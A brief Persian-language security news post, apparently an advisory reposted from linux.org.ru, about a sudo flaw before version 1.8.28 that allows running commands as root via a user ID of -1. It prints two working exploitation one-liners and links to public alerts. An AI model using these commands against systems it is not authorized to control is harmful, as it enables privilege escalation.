یک اشکال در sudo به شما این امکان را میدهد که هر فایل اجرایی را بهعنوان روت اجرا کنید، اگر /etc/sudoers اجازه میدهد توسط سایر کاربران اجرا شود و برای روت ممنوع است.
بهره برداری از خطا بسیار ساده است:
sudo -u#-1 id -u
یا:
sudo -u#4294967295 id -u
این خطا در تمام نسخه های sudo قبل از 1.8.28 وجود دارد
جزئیات:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
منبع: linux.org.ru